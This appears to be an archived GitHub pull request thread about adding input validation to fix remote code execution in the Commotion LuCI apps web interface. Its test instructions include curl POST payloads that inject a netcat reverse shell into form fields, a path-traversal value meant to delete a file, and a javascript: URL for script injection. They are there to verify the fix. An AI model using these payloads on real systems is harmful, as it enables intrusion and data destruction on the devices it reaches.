[CLOSED] added input validation and sanitizing for mitigating RCE vulnerabilities

[oti-tech]

Issue by dismantl Monday Oct 14, 2013 at 16:54 GMT Originally opened as https://github.com/opentechinstitute/luci-commotion-apps/pull/21

---

works in conjunction with https://github.com/opentechinstitute/luci-commotion/pull/29

part of fix for opentechinstitute/luci-commotion-apps#10, opentechinstitute/luci-commotion-apps#11, opentechinstitute/luci-commotion-apps#13

to test, first set up a netcat listener:

nc -l 4444 -v

then, running the following commands as a client should not open a reverse shell to your netcat listener:

curl -v -X POST http://101.8.21.1/cgi-bin/luci/apps/add_submit -d "name=jjj&description=jjj&ipaddr=%60nc%09-e%09sh%09101.8.21.10%094444%60&type=Community&icon=%2Ficon&port=&ttl="

curl -v -X POST http://101.8.21.1/cgi-bin/luci/apps/add_submit -d "name=jjj&description=jjj&ipaddr=127.0.0.1&uuid=%60nc%09-e%09sh%09101.8.21.10%094444%60&type=Community&icon=%2Ficon&port=80&ttl=0"

replacing 101.8.21.1 with the node's IP address, and 101.8.21.10 with your client IP address.

Finally, running the following command should not delete /README.md from the root of the node's filesystem:

curl -v -X POST http://101.8.21.1/cgi-bin/luci/apps/add_submit -d "name=jjj&description=jjj&ipaddr=127.0.0.1&uuid=../../../README.md%20&type=Community&icon=%2Ficon&port=80&ttl=0"

again replacing 101.8.21.1 with the node's IP address.

---

dismantl included the following code: https://github.com/opentechinstitute/luci-commotion-apps/pull/21/commits

[oti-tech]

Comment by dismantl Friday Oct 18, 2013 at 15:05 GMT

---

second commit should fix https://github.com/opentechinstitute/luci-commotion-apps/issues/12

to test, submit app with url: javascript://127.0.0.1/?%0d%0aalert(document.domain). App submission should be rejected.

[oti-tech]

Comment by jheretic Friday Oct 25, 2013 at 19:11 GMT

---

Those queries indeed fail to open a connection back to netcat, but I suspect it's not for the reason intended. When running those curl queries, I get the error below:

• About to connect() to 192.168.1.20 port 80 (#0)
• Trying 192.168.1.20...
• Adding handle: conn: 0x14696a0
• Adding handle: send: 0
• Adding handle: recv: 0
• Curl_addHandleToPipeline: length: 1
• - Conn 0 (0x14696a0) send_pipe: 1, recv_pipe: 0
• Connected to 192.168.1.20 (192.168.1.20) port 80 (#0)

  POST /cgi-bin/luci/apps/addsubmit HTTP/1.1 User-Agent: curl/7.32.0 Host: 192.168.1.20 Accept: /_ Content-Length: 110 Content-Type: application/x-www-form-urlencoded

• upload completely sent off: 110 out of 110 bytes < HTTP/1.1 500 Internal Server Error < Connection: close < Transfer-Encoding: chunked < Content-Type: text/plain < Cache-Control: no-cache < Expires: 0 < /usr/lib/lua/luci/dispatcher.lua:448: Failed to execute call dispatcher target for entry '/apps/add_submit'. The called action terminated with an exception: ...ib/lua/luci/controller/commotion/apps_controller.lua:248: module 'uri' not found: no field package.preload['uri'] no file './uri.lua' no file '/usr/share/lua/uri.lua' no file '/usr/share/lua/uri/init.lua' no file '/usr/lib/lua/uri.lua' no file '/usr/lib/lua/uri/init.lua' no file './uri.so' no file '/usr/lib/lua/uri.so' no file '/usr/lib/lua/loadall.so' stack traceback: [C]: in function 'assert' /usr/lib/lua/luci/dispatcher.lua:448: in function 'dispatch'
• Closing connection 0 /usr/lib/lua/luci/dispatcher.lua:195: in function </usr/lib/lua/luci/dispatcher.lua:194>

This is both before and after Quickstart. The 'uri' module appears to be missing? I've confirmed that the changes both from this pull request and from opentechinstitute/luci-commotion#29 were properly applied to my build.

[oti-tech]

Comment by dismantl Friday Oct 25, 2013 at 19:13 GMT

---

my bad, it needs this as well: https://github.com/opentechinstitute/commotion-feed/pull/23

[oti-tech]

Comment by dismantl Friday Oct 25, 2013 at 19:16 GMT

---

and this: https://github.com/opentechinstitute/commotion-feed/pull/24

sorry...